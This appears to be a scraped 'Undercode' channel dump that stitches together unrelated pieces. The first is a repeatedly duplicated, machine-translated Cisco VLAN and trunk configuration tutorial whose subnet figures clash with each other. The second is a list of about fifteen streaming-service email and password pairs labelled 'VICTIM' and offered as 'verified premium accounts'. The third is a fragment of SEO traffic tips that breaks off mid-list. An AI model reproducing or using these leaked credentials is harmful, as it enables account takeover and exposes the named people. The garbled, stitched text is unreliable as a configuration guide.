---- We can see from Figure 1 that the central office switch adopts Cisco Catalyst 6506, and its level 2 nodes are
Catalyst 3508 and Catalyst 3548. The Catalyst 3508 switch has 8 Gigabit Ethernet ports and utilizes the
Catalyst 3500 series The stacking capacity of the switch can expand the number of workstations at any time. The edge switch uses
Catalyst 3548 with a Gigabit module. The second level unit's central switch uses Cisco Catalyst 4006, and its second level nodes
and edge switches also use Catalyst 3548. The connection between the company headquarters and each secondary subsidiary unit adopts the ISL package
Trunk mode, connected by 2 groups of optical fibers (between Catalyst 6506 and Catalyst 4006), which not only solves the
interconnection problem between VLANs , but also improves network bandwidth and system redundancy, and provides reliable guarantee for the interconnection of three subnets . For
the connection to the Internet, the interface is 2MB DDN dedicated line access, and each secondary unit accesses the Internet through the Proxy of the company headquarters.
The management of the Internet is planned by the company headquarters information center.
---- It should be noted that, in this case, the division of VLAN covers each switch, so the connection between switches
must use the Trunk method. Since the manager office and the supply and marketing subnet represent two problems in VLAN division: the division of the extended switch VLAN
and the port VLAN, we will introduce the manager subnet and the supply and marketing subnet to VLAN in detail.
Manager-managed VLAN
---- Because the LAN switch where the manager-managed workstation is located is divided into multiple VLANs and connected to multiple VLAN workstations,
the connection between the switch and its upper-layer switch must be trunked (see Figure 2).
---- The company headquarters adopted Catalyst 3508 and Catalyst 6506, the second-level unit 1 adopted Catalyst 3548 and
Catalyst 4006, and the second-level unit 2 adopted Catalyst 3548 and Catalyst 4006.
Catalyst 3508 and Catalyst 3548. The Catalyst 3508 switch has 8 Gigabit Ethernet ports and utilizes the
Catalyst 3500 series The stacking capacity of the switch can expand the number of workstations at any time. The edge switch uses
Catalyst 3548 with a Gigabit module. The second level unit's central switch uses Cisco Catalyst 4006, and its second level nodes
and edge switches also use Catalyst 3548. The connection between the company headquarters and each secondary subsidiary unit adopts the ISL package
Trunk mode, connected by 2 groups of optical fibers (between Catalyst 6506 and Catalyst 4006), which not only solves the
interconnection problem between VLANs , but also improves network bandwidth and system redundancy, and provides reliable guarantee for the interconnection of three subnets . For
the connection to the Internet, the interface is 2MB DDN dedicated line access, and each secondary unit accesses the Internet through the Proxy of the company headquarters.
The management of the Internet is planned by the company headquarters information center.
---- It should be noted that, in this case, the division of VLAN covers each switch, so the connection between switches
must use the Trunk method. Since the manager office and the supply and marketing subnet represent two problems in VLAN division: the division of the extended switch VLAN
and the port VLAN, we will introduce the manager subnet and the supply and marketing subnet to VLAN in detail.
Manager-managed VLAN
---- Because the LAN switch where the manager-managed workstation is located is divided into multiple VLANs and connected to multiple VLAN workstations,
the connection between the switch and its upper-layer switch must be trunked (see Figure 2).
---- The company headquarters adopted Catalyst 3508 and Catalyst 6506, the second-level unit 1 adopted Catalyst 3548 and
Catalyst 4006, and the second-level unit 2 adopted Catalyst 3548 and Catalyst 4006.
Supply and Marketing VLAN
Although a switch covers multiple VLANs, it must be connected by Trunk, but in the distribution of supply and marketing VLAN, the supply and marketing in
its second unit 1 is independent of the switch Catalyst 3548, so here, the Catalyst 3548 and the second center
The Catalyst 4006 switch only needs to use a normal switched connection (as shown in Figure 3). For this part of the supply and marketing VLAN
division, as long as the Catalyst 4006 is connected to the port connected to the Catalyst 3548. This is a
port-based VLAN division.
Since the two Catalyst 4006 and the main central switch Catalyst 6506 use a dual-fiber channel connection, which shields
the occurrence of line faults between the Catalyst 4006 and the Catalyst 6506,
the centralized network routing is managed based on the Catalyst 6506. Below we make an introduction to routing between VLANs.
Set the VLAN routing on the central switch Catalyst 6506 as follows.
Manager Office VLAN: 192.168.1.1/22
Financial VLAN: 192.168.3.1/22
Supply and Marketing VLAN: 192.168.6.1/22
Information Center VLAN: 192.168.7.1/24
Other VLANs: 192.168.8.1/22
Set the routing protocol RIP on the central switch Or OSPF, and specify the network segment 192.168.0.0. Execute
the following commands in the global configuration mode .
router rip network 192.168.0.0
Since the IP address is on the 192.168.0.0 network segment, the IP address assignment for each VLAN is as follows.
Manager subnet: 192.168.1.0, subnet mask: 255.255.255.0, gateway: 192.168.1.1.
Financial subnet: 192.168.2.0, subnet mask: 255.255.255.0, gateway: 192.168.2.1.
Supply and marketing subnet: 192.168.3.0, subnet mask is 255.255.255.0, gateway: 192.168.3.1.
Information center subnet: 192.168.4.0, subnet mask: 255.255.255.0, gateway: 192.168.4.1.
Server subnet: 192.168.100.0, subnet mask: 255.255.255.0, gateway: 192.168.100.1.
Remaining subnets: 192.168.8.0, subnet mask is 255.255.255.0, gateway: 192.168.8.1.
According to the above IP address allocation, it is not difficult to see that the number of network terminals in each subnet can reach 254, which fully meets the current
or future application needs, and at the same time reduces the management workload and enhances the management intensity.
Precautions
Note: Because the VLAN division of the Hoisting Equipment Corporation's unified network system is designed as an overall structure
, in order to maintain consistency with the VLAN list, Catalyst 4006 is required to broadcast the rest of the overall network.
Therefore, when setting up VTP (VLAN Trunk Protocol), pay attention to the VTP domain as a whole, where the VTP types are
Server and Client.
Some enterprises build the network earlier, if the network equipment selected is the product of other manufacturers, and the products in the later period cannot be compared with the earlier period.
Unification, so that you will encounter some problems in the division of VLAN. For example,
to divide VLANs in the mixed network structure of Cisco products and 3COM products, the encapsulation protocol of the Cisco network equipment trunk must use 802.1q to achieve
the purpose of communicating with 3COM products . Although the normal division of VLAN and normal application can be established between the two
, the coordination between the two is slightly worse. When the connection between the two changes, you must use the Clear Counter command on the Cisco switch
to clear it so that the two can work in harmony.
Although a switch covers multiple VLANs, it must be connected by Trunk, but in the distribution of supply and marketing VLAN, the supply and marketing in
its second unit 1 is independent of the switch Catalyst 3548, so here, the Catalyst 3548 and the second center
The Catalyst 4006 switch only needs to use a normal switched connection (as shown in Figure 3). For this part of the supply and marketing VLAN
division, as long as the Catalyst 4006 is connected to the port connected to the Catalyst 3548. This is a
port-based VLAN division.
Since the two Catalyst 4006 and the main central switch Catalyst 6506 use a dual-fiber channel connection, which shields
the occurrence of line faults between the Catalyst 4006 and the Catalyst 6506,
the centralized network routing is managed based on the Catalyst 6506. Below we make an introduction to routing between VLANs.
Set the VLAN routing on the central switch Catalyst 6506 as follows.
Manager Office VLAN: 192.168.1.1/22
Financial VLAN: 192.168.3.1/22
Supply and Marketing VLAN: 192.168.6.1/22
Information Center VLAN: 192.168.7.1/24
Other VLANs: 192.168.8.1/22
Set the routing protocol RIP on the central switch Or OSPF, and specify the network segment 192.168.0.0. Execute
the following commands in the global configuration mode .
router rip network 192.168.0.0
Since the IP address is on the 192.168.0.0 network segment, the IP address assignment for each VLAN is as follows.
Manager subnet: 192.168.1.0, subnet mask: 255.255.255.0, gateway: 192.168.1.1.
Financial subnet: 192.168.2.0, subnet mask: 255.255.255.0, gateway: 192.168.2.1.
Supply and marketing subnet: 192.168.3.0, subnet mask is 255.255.255.0, gateway: 192.168.3.1.
Information center subnet: 192.168.4.0, subnet mask: 255.255.255.0, gateway: 192.168.4.1.
Server subnet: 192.168.100.0, subnet mask: 255.255.255.0, gateway: 192.168.100.1.
Remaining subnets: 192.168.8.0, subnet mask is 255.255.255.0, gateway: 192.168.8.1.
According to the above IP address allocation, it is not difficult to see that the number of network terminals in each subnet can reach 254, which fully meets the current
or future application needs, and at the same time reduces the management workload and enhances the management intensity.
Precautions
Note: Because the VLAN division of the Hoisting Equipment Corporation's unified network system is designed as an overall structure
, in order to maintain consistency with the VLAN list, Catalyst 4006 is required to broadcast the rest of the overall network.
Therefore, when setting up VTP (VLAN Trunk Protocol), pay attention to the VTP domain as a whole, where the VTP types are
Server and Client.
Some enterprises build the network earlier, if the network equipment selected is the product of other manufacturers, and the products in the later period cannot be compared with the earlier period.
Unification, so that you will encounter some problems in the division of VLAN. For example,
to divide VLANs in the mixed network structure of Cisco products and 3COM products, the encapsulation protocol of the Cisco network equipment trunk must use 802.1q to achieve
the purpose of communicating with 3COM products . Although the normal division of VLAN and normal application can be established between the two
, the coordination between the two is slightly worse. When the connection between the two changes, you must use the Clear Counter command on the Cisco switch
to clear it so that the two can work in harmony.
VLAN The
so-called VLAN means that nodes in different physical locations form different logical subnets according to needs, that is, a VLAN is a
logical broadcast domain, which can cover multiple network devices. VLAN allows network users in different geographical locations to join a
logical subnet and share a broadcast domain. The creation of VLANs can control the generation of broadcast storms, thereby improving
the overall performance and security of the switched network.
VLANs are completely transparent to network users. Users do not feel any difference from the switched network in use,
but they are very different for network administrators, because it mainly depends on the advantages of VLANs.
1.
There are two main ways to control broadcast storms : physical network segmentation and VLAN logical segmentation.
2. Improve overall network security
Through VLAN allocation principles such as routing access lists and MAC address allocation, you can control user access rights and logical network
segment sizes.
3. Simple and intuitive network management
For switched Ethernet, if some users reassign network segments, network administrators need
to readjust the physical structure of the network system , and even need to add network equipment to increase the workload of network management. For
a network using VLAN technology, only the network management personnel needs to redistribute the VLAN segment of the user in the network management center
.
About the Trunk method
Trunk is independent of VLAN and simulates multiple physical links as a logical link between VLAN and VLAN connection
. The Trunk method can not only connect different VLANs or the same VLAN across multiple switches, but also increase
the physical connection bandwidth between switches and enhance the redundancy between network devices. Because based VLAN switch among the switches
of the ports belong to each VLAN segments, if a VLAN ports for cascade between network devices, which the network device is
a network terminal in his VLAN membership and will not Communicate with VLAN network terminals of other network equipment. In view of this,
the cascading between network devices must use the Trunk method, so that the port does not belong to any VLAN, which means that
the cascading link between the network devices built by the port is a common channel for all VLANs to communicate.
4 strategies
for VLAN division 1. Port-based VLAN division
Port-based VLAN division is the simplest and most effective division method. This method only requires the network administrator to
reassign the switch port of the network device , regardless of the device connected to the port.
2. VLAN division based on MAC address
The MAC address actually refers to the identifier of the network card. The MAC address of each network card is unique and solidified on the network card. The MAC
address is represented by a 12-digit hexadecimal number, the first 8 digits are the manufacturer's logo, and the last 4 digits are the network card logo.
VLAN division based on MAC address is actually a combination of VLAN based on workstation and server.
This solution is also a good method when the network scale is small , but with the expansion of the network scale, the increase of network equipment and users will greatly
increase the difficulty of management.
3. VLAN division based on routing The
routing protocol works at the network layer, and the corresponding working devices include routers and routing switches. This method allows a VLAN to span
multiple switches, or a port in multiple VLANs.
4. VLAN division
based on policy VLAN division based on policy is a more effective and direct way. This mainly depends on
the strategy adopted in VLAN division . For now, the above methods 1 and 3 are mainly adopted for the division of VLAN, and the second method is an auxiliary solution.
so-called VLAN means that nodes in different physical locations form different logical subnets according to needs, that is, a VLAN is a
logical broadcast domain, which can cover multiple network devices. VLAN allows network users in different geographical locations to join a
logical subnet and share a broadcast domain. The creation of VLANs can control the generation of broadcast storms, thereby improving
the overall performance and security of the switched network.
VLANs are completely transparent to network users. Users do not feel any difference from the switched network in use,
but they are very different for network administrators, because it mainly depends on the advantages of VLANs.
1.
There are two main ways to control broadcast storms : physical network segmentation and VLAN logical segmentation.
2. Improve overall network security
Through VLAN allocation principles such as routing access lists and MAC address allocation, you can control user access rights and logical network
segment sizes.
3. Simple and intuitive network management
For switched Ethernet, if some users reassign network segments, network administrators need
to readjust the physical structure of the network system , and even need to add network equipment to increase the workload of network management. For
a network using VLAN technology, only the network management personnel needs to redistribute the VLAN segment of the user in the network management center
.
About the Trunk method
Trunk is independent of VLAN and simulates multiple physical links as a logical link between VLAN and VLAN connection
. The Trunk method can not only connect different VLANs or the same VLAN across multiple switches, but also increase
the physical connection bandwidth between switches and enhance the redundancy between network devices. Because based VLAN switch among the switches
of the ports belong to each VLAN segments, if a VLAN ports for cascade between network devices, which the network device is
a network terminal in his VLAN membership and will not Communicate with VLAN network terminals of other network equipment. In view of this,
the cascading between network devices must use the Trunk method, so that the port does not belong to any VLAN, which means that
the cascading link between the network devices built by the port is a common channel for all VLANs to communicate.
4 strategies
for VLAN division 1. Port-based VLAN division
Port-based VLAN division is the simplest and most effective division method. This method only requires the network administrator to
reassign the switch port of the network device , regardless of the device connected to the port.
2. VLAN division based on MAC address
The MAC address actually refers to the identifier of the network card. The MAC address of each network card is unique and solidified on the network card. The MAC
address is represented by a 12-digit hexadecimal number, the first 8 digits are the manufacturer's logo, and the last 4 digits are the network card logo.
VLAN division based on MAC address is actually a combination of VLAN based on workstation and server.
This solution is also a good method when the network scale is small , but with the expansion of the network scale, the increase of network equipment and users will greatly
increase the difficulty of management.
3. VLAN division based on routing The
routing protocol works at the network layer, and the corresponding working devices include routers and routing switches. This method allows a VLAN to span
multiple switches, or a port in multiple VLANs.
4. VLAN division
based on policy VLAN division based on policy is a more effective and direct way. This mainly depends on
the strategy adopted in VLAN division . For now, the above methods 1 and 3 are mainly adopted for the division of VLAN, and the second method is an auxiliary solution.
The application of VLAN in network management
1. Preface The
computer network of Guangzhou Branch is part of the second phase of the "100 Networking" project of the Chinese Academy of Sciences. The network center equipment was installed and
operated in early 1998. With the development of user access and network applications, it is running, Encountered many problems in management. While there has been gradual improvement of network
distribution center equipment and servers and the establishment of appropriate management systems, some issues can be resolved and control, but to prevent a
few recalcitrant users often use unauthorized IP access problems can not be solved, network management personnel It takes a lot of energy for this. At that
time, I wanted to do IP-MAC binding on the border router, but because CSTNET considers the overall security of the network, the border router has the right to manage
Controlled by the hospital network center, Guangzhou branch network node is two, such as the IP-MAC binding on the border router, unfavorable
to network monitoring and management, a number of events that may occur can not respond quickly, so It is actually not feasible. Solving the
problem can only be started on the network center equipment of Guangzhou Branch.
Second, the network structure configuration and solution
Since 4500 is only equipped with high-speed port f0, the rest are asynchronous ports, so that the border routing Cisco 2514 can only access the Catalyst 3200,
and form a "flat structure" structure with all LANs, which causes inherent deficiencies to prevent IP theft problems .
From the analysis of the Catalyst 3200 virtual network function, it can be seen that in addition to the advantages of the virtual network function itself,
the high-speed ports of the Catalyst 3200 switch and Cisco 4500 router support ISL (InterSwitch Link) and VTP (VLAN TRUNK PROTOCOL),
which provides for enhanced network management. Strong technical guarantee. By setting the virtual network on the Catalyst 3200 port, and then according
to the principle of the physical location, working nature, and network communication load of the network users as much as possible, all network users are included in different
virtual subnets. Each subnet passes through the Catalyst 3200 and Cisco 4500. The high-speed port connection-routing, and then bind the IP-MAC to the
Cisco 4500 may achieve the intended purpose.
3. Configuration of virtual subnet VLAN
1) . Configuration of VLAN and VTP on Catalyst 3200 switch enters Catalyst 3200 console via hyper terminal
a). Set VLAN management domain and enter "SET VTP AND ...", select "VTP ADMINISTRATION"
CONFIGURATION "Set the VALN management domain name" GIETNET "; VTP mode is" SERVER ".
B). Set VLAN and TRUNK: Connect all subnet switches and HUBs to the 10MB or
100MB ports of the Catalyst 3200 , and assign VLANs according to the above principles , And divide these ports into virtual networks as follows:
This setting is to select "LOCAL VLAN PROT CONFIGURATION" from the CONFIGURATION of the console
, specify the VLAN and TRUNK port, and fill all 3 VLANs into the TRUNK port configuration sheet In the end, the
following is shown as
2). The setting of
the Cisco 4500 router "splits" the f0 port of the Cisco 4500 into the corresponding "sub-ports" according to the number of subnets. According to the ISL
(InterSwitch Link) number set by it , proceed with the corresponding subnet Logical connection. In this example, f0 is divided into f0.1,
f0.2, and f0.3 to connect to VLAN1, VLAN2, and VLAN3, and the configuration commands are as follows:
router # config t
router (config) #int f0.1
router (config-subif) #Description VLAN1_GIET
router (config-subif) #ip address 192.168.111.1 255.255.255.192
router (config-subif) #encapsulation isl 2
..
router (config) #int f0.2
router (config-subif) #Description VLAN2_gzbnic
router (config-subif) #ip addess 192.168.111.65 255.255.255.192
router (config-subif ) #encapsulation isl 3
..
Ctl Z
wr is
1. Preface The
computer network of Guangzhou Branch is part of the second phase of the "100 Networking" project of the Chinese Academy of Sciences. The network center equipment was installed and
operated in early 1998. With the development of user access and network applications, it is running, Encountered many problems in management. While there has been gradual improvement of network
distribution center equipment and servers and the establishment of appropriate management systems, some issues can be resolved and control, but to prevent a
few recalcitrant users often use unauthorized IP access problems can not be solved, network management personnel It takes a lot of energy for this. At that
time, I wanted to do IP-MAC binding on the border router, but because CSTNET considers the overall security of the network, the border router has the right to manage
Controlled by the hospital network center, Guangzhou branch network node is two, such as the IP-MAC binding on the border router, unfavorable
to network monitoring and management, a number of events that may occur can not respond quickly, so It is actually not feasible. Solving the
problem can only be started on the network center equipment of Guangzhou Branch.
Second, the network structure configuration and solution
Since 4500 is only equipped with high-speed port f0, the rest are asynchronous ports, so that the border routing Cisco 2514 can only access the Catalyst 3200,
and form a "flat structure" structure with all LANs, which causes inherent deficiencies to prevent IP theft problems .
From the analysis of the Catalyst 3200 virtual network function, it can be seen that in addition to the advantages of the virtual network function itself,
the high-speed ports of the Catalyst 3200 switch and Cisco 4500 router support ISL (InterSwitch Link) and VTP (VLAN TRUNK PROTOCOL),
which provides for enhanced network management. Strong technical guarantee. By setting the virtual network on the Catalyst 3200 port, and then according
to the principle of the physical location, working nature, and network communication load of the network users as much as possible, all network users are included in different
virtual subnets. Each subnet passes through the Catalyst 3200 and Cisco 4500. The high-speed port connection-routing, and then bind the IP-MAC to the
Cisco 4500 may achieve the intended purpose.
3. Configuration of virtual subnet VLAN
1) . Configuration of VLAN and VTP on Catalyst 3200 switch enters Catalyst 3200 console via hyper terminal
a). Set VLAN management domain and enter "SET VTP AND ...", select "VTP ADMINISTRATION"
CONFIGURATION "Set the VALN management domain name" GIETNET "; VTP mode is" SERVER ".
B). Set VLAN and TRUNK: Connect all subnet switches and HUBs to the 10MB or
100MB ports of the Catalyst 3200 , and assign VLANs according to the above principles , And divide these ports into virtual networks as follows:
This setting is to select "LOCAL VLAN PROT CONFIGURATION" from the CONFIGURATION of the console
, specify the VLAN and TRUNK port, and fill all 3 VLANs into the TRUNK port configuration sheet In the end, the
following is shown as
2). The setting of
the Cisco 4500 router "splits" the f0 port of the Cisco 4500 into the corresponding "sub-ports" according to the number of subnets. According to the ISL
(InterSwitch Link) number set by it , proceed with the corresponding subnet Logical connection. In this example, f0 is divided into f0.1,
f0.2, and f0.3 to connect to VLAN1, VLAN2, and VLAN3, and the configuration commands are as follows:
router # config t
router (config) #int f0.1
router (config-subif) #Description VLAN1_GIET
router (config-subif) #ip address 192.168.111.1 255.255.255.192
router (config-subif) #encapsulation isl 2
..
router (config) #int f0.2
router (config-subif) #Description VLAN2_gzbnic
router (config-subif) #ip addess 192.168.111.65 255.255.255.192
router (config-subif ) #encapsulation isl 3
..
Ctl Z
wr is
set up, and then ask the Beijing Network Center to point all relevant subnet routing items in the border router to Cisco 4500, and the user's
gateway is set according to its subnet router address.
3). Establish an ARP table on the Cisco 4500 router
To strengthen network management and prevent IP theft, establish an ARP table on the Cisco 4500 router to bind all subnet IPs to the corresponding
network card MAC addresses, as well as unused IP Binding, such as:
ARP 192.168.111.130 0800.3c5d.419f ARPA (the allocated IP has a network card address)
.
ARP 192.168.111.169 0000.0000.0000 ARPA (unallocated IP without a network card address)
When the registered network user needs to change the network card, it needs to obtain the confirmation and consent of the network management personnel, and it will not be possible
for the illegal thief (see below); In addition, security control measures such as access control lists can be set according to the specific situation.
Fourth, the system characteristics
After the combination of virtual network settings and IP-MAC binding, the characteristics of the network system:
1). Take advantage of VLAN
Reasonably allocate network resources, balance network load, effectively reduce online broadcast information, and facilitate group management of users.
2). Enhanced network security
Because the subnets of the network are isolated from each other, network communication is limited to the subnet; traffic or outbound communication between the subnets all pass through
their corresponding routing ports, which strengthens the control capacity of the Cisco 4500 to the entire network. And the
validity of user IP is checked by the ARP table on 4500 .
3) enhance network management, billing reasonable
as 2), due to the configuration of the virtual network coupled Cisco 4500 matching check of the IP-MAC, IP theft than the average so that the
more difficult binding site, on the grounds that In this configuration structure, even if you want to steal, the communication is limited to this subnet (the range of activity is
greatly reduced, and the possibility of being caught on the spot is increased); IP-MAC matching verification on the Cisco 4500 makes billable IP theft
Unable to use (theft becomes meaningless), so as to achieve a reasonable charge and effectively improve network management and control capabilities.
This work was completed last year and the operation is stable and meets the requirements.
Explanation of terms:
1). VLAN TRUNK PROTOCOL (VTP):
Use VTP to set and manage VLANs in the entire domain. VTP automatically publishes configuration information in the management domain.
TRUNK connections, such as Switch Interconnect (ISL), 802.10, and ATMLAN (LANE) When the switch is powered on, it periodically
sends out VTP configuration requests until it receives the neighbor's summary broadcast information, which is necessary for structural configuration Update.
The VTP configuration of the switch has three modes: server, client and transparent mode.
2). ISLTRUNK ISL relays different VLAN multi-lane packets, and the packet header carries the "ISL VLAN number" flag (VTP VLAN ID).
CISCO switches support VLAN list
1900 series standard version: no VLAN
1900 series enterprise version: support 1024 ISL VLAN
2926: support 1000 ISL VLAN
2948G: support 1024 802.1Q VLAN
2912XL / 2912MF XL / 2924XL / 2924C XL / 2924M XL Support 64 ISL 802.1Q VLAN
6006600965066509 Support 1000 VLAN
4003 4006 Support 1024ISL (L3) /802.1Q
5002 5000 5500 5505 5509 Support 1000 VLAN
E N J O Y
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
gateway is set according to its subnet router address.
3). Establish an ARP table on the Cisco 4500 router
To strengthen network management and prevent IP theft, establish an ARP table on the Cisco 4500 router to bind all subnet IPs to the corresponding
network card MAC addresses, as well as unused IP Binding, such as:
ARP 192.168.111.130 0800.3c5d.419f ARPA (the allocated IP has a network card address)
.
ARP 192.168.111.169 0000.0000.0000 ARPA (unallocated IP without a network card address)
When the registered network user needs to change the network card, it needs to obtain the confirmation and consent of the network management personnel, and it will not be possible
for the illegal thief (see below); In addition, security control measures such as access control lists can be set according to the specific situation.
Fourth, the system characteristics
After the combination of virtual network settings and IP-MAC binding, the characteristics of the network system:
1). Take advantage of VLAN
Reasonably allocate network resources, balance network load, effectively reduce online broadcast information, and facilitate group management of users.
2). Enhanced network security
Because the subnets of the network are isolated from each other, network communication is limited to the subnet; traffic or outbound communication between the subnets all pass through
their corresponding routing ports, which strengthens the control capacity of the Cisco 4500 to the entire network. And the
validity of user IP is checked by the ARP table on 4500 .
3) enhance network management, billing reasonable
as 2), due to the configuration of the virtual network coupled Cisco 4500 matching check of the IP-MAC, IP theft than the average so that the
more difficult binding site, on the grounds that In this configuration structure, even if you want to steal, the communication is limited to this subnet (the range of activity is
greatly reduced, and the possibility of being caught on the spot is increased); IP-MAC matching verification on the Cisco 4500 makes billable IP theft
Unable to use (theft becomes meaningless), so as to achieve a reasonable charge and effectively improve network management and control capabilities.
This work was completed last year and the operation is stable and meets the requirements.
Explanation of terms:
1). VLAN TRUNK PROTOCOL (VTP):
Use VTP to set and manage VLANs in the entire domain. VTP automatically publishes configuration information in the management domain.
TRUNK connections, such as Switch Interconnect (ISL), 802.10, and ATMLAN (LANE) When the switch is powered on, it periodically
sends out VTP configuration requests until it receives the neighbor's summary broadcast information, which is necessary for structural configuration Update.
The VTP configuration of the switch has three modes: server, client and transparent mode.
2). ISLTRUNK ISL relays different VLAN multi-lane packets, and the packet header carries the "ISL VLAN number" flag (VTP VLAN ID).
CISCO switches support VLAN list
1900 series standard version: no VLAN
1900 series enterprise version: support 1024 ISL VLAN
2926: support 1000 ISL VLAN
2948G: support 1024 802.1Q VLAN
2912XL / 2912MF XL / 2924XL / 2924C XL / 2924M XL Support 64 ISL 802.1Q VLAN
6006600965066509 Support 1000 VLAN
4003 4006 Support 1024ISL (L3) /802.1Q
5002 5000 5500 5505 5509 Support 1000 VLAN
E N J O Y
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Network configuration-LAN implementation VLAN example full by Undercode - E N J O Y
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ VERIFIED NEW Zee5 Premium Accounts
VICTIM???> purabgandhi29@gmail.com:sailesh349
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> taru172002@yahoo.com:tttttttt
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> rahulm1990@hotmail.com:arabians
Subscription?> All Access Monthly Pack
DEAD Date?> 2020-04-28
Renewal?> TRUE
================
VICTIM???> samirjshah@yahoo.com:landu1
Subscription?> All Access (Offer till Oct 31, 2018)
Plan?> Karenjit Launch Offer
DEAD Date?> 2020-05-09
Renewal?> FALSE
================
VICTIM???> mitsdave@gmail.com:arc00arc
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> jogendrathakker@gmail.com:cb2000
Subscription?> ZEE5-Airtel Thanks Complimentary Offer
DEAD Date?> 2020-05-24
Renewal?> FALSE
================
VICTIM???> taru172002@yahoo.com:tttttttt
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> purabgandhi29@gmail.com:sailesh349
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> vaibhav.gupta188@gmail.com:Gopu@shivji0
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-26
Renewal?> TRUE
================
VICTIM???> rajivthakar@hotmail.com:55378008
Subscription?> All Access Pack
Plan?> All Access - 1 yr
DEAD Date?> 2020-12-27
Renewal?> FALSE
================
VICTIM???> rajniram77@gmail.com:rararabh
Subscription?> Samsung Free Trial- 30 Days
DEAD Date?> 2020-05-16
Renewal?> FALSE
================
VICTIM???> rajeshp2408@gmail.com:August24
Subscription?> Complimentary Pack
DEAD Date?> 2020-04-27
Renewal?> FALSE
================
VICTIM???> rajas68@gmail.com:leoraj68
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-25
Renewal?> TRUE
================
VICTIM???> rajeshdudeja@hotmail.com:diyaram123
Subscription?> ZEE5-Airtel Thanks Complimentary Offer
DEAD Date?> 2020-05-25
Renewal?> FALSE
================
VICTIM???> rajeevporwal20@gmail.com:sarika
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> rajkumar@bitmesra.ac.in:raj@1976
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-04-29
Renewal?> TRUE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ VERIFIED NEW Zee5 Premium Accounts
VICTIM???> purabgandhi29@gmail.com:sailesh349
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> taru172002@yahoo.com:tttttttt
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> rahulm1990@hotmail.com:arabians
Subscription?> All Access Monthly Pack
DEAD Date?> 2020-04-28
Renewal?> TRUE
================
VICTIM???> samirjshah@yahoo.com:landu1
Subscription?> All Access (Offer till Oct 31, 2018)
Plan?> Karenjit Launch Offer
DEAD Date?> 2020-05-09
Renewal?> FALSE
================
VICTIM???> mitsdave@gmail.com:arc00arc
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> jogendrathakker@gmail.com:cb2000
Subscription?> ZEE5-Airtel Thanks Complimentary Offer
DEAD Date?> 2020-05-24
Renewal?> FALSE
================
VICTIM???> taru172002@yahoo.com:tttttttt
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> purabgandhi29@gmail.com:sailesh349
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> vaibhav.gupta188@gmail.com:Gopu@shivji0
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-26
Renewal?> TRUE
================
VICTIM???> rajivthakar@hotmail.com:55378008
Subscription?> All Access Pack
Plan?> All Access - 1 yr
DEAD Date?> 2020-12-27
Renewal?> FALSE
================
VICTIM???> rajniram77@gmail.com:rararabh
Subscription?> Samsung Free Trial- 30 Days
DEAD Date?> 2020-05-16
Renewal?> FALSE
================
VICTIM???> rajeshp2408@gmail.com:August24
Subscription?> Complimentary Pack
DEAD Date?> 2020-04-27
Renewal?> FALSE
================
VICTIM???> rajas68@gmail.com:leoraj68
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-25
Renewal?> TRUE
================
VICTIM???> rajeshdudeja@hotmail.com:diyaram123
Subscription?> ZEE5-Airtel Thanks Complimentary Offer
DEAD Date?> 2020-05-25
Renewal?> FALSE
================
VICTIM???> rajeevporwal20@gmail.com:sarika
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-05-23
Renewal?> TRUE
================
VICTIM???> rajkumar@bitmesra.ac.in:raj@1976
Subscription?> All Access Pack
Plan?> All Access - 1 mth
DEAD Date?> 2020-04-29
Renewal?> TRUE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How Increase tRaffic on your site ??
instagram.com/UndercOdeTesting
1) Expand the semantic core
Do not focus only on high-frequency queries. Most sites, especially those that are starting to compete with the leaders of their niche, receive most of the traffic from medium and low frequency queries. Think over the structure of the site in advance and start working with texts on the principle of βone key = one articleβ.
2) Select keys that are relevant to the interests of the target audience
For example, you sell plastic windows. And two queries hit your kernel. The first: "second-hand plastic windows" and the second "order repair of plastic windows." What do you think, which one to leave so that a warm potential customer is ready to make an order?
How to increase traffic to the site using content marketing?
3) Blog
Publish articles that will be not only interesting, but also easy to read, choose a readable font, highlight subheadings, separate text with paragraphs, insert quotes and insets.
4) A good blog - a regular blog
The optimal frequency of publications is twice a week. Sometimes the results have to wait longer than one to two months. The main thing is not to give up and not to slow down. Blogging requires a solid investment of time and effort. Accept this fact and your efforts are guaranteed to pay off.
5) Observe the release time of materials
Over time, the blog will have a permanent audience. And itβs very good if she has the habit of regularly reading new materials. For example, at 16.00 on Wednesdays and Fridays.
Method number 6 Release materials unique in meaning
